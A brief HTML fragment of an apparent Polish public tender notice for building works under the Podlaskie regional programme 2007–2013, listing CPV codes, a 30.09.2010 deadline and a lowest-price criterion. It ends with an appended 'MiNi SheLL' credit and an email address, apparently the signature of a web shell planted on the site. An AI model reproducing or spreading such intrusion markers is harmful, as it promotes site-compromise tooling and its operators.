4. Szczegółowy zakres robót dot. zadania 1, 2 i 3 zwierają załączone projekty, przedmiary robót oraz  szczegółowe specyfikacje techniczne.

5. Zamówienia będą realizowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007 - 2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.21.23.21-5, 45.21.33.15-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com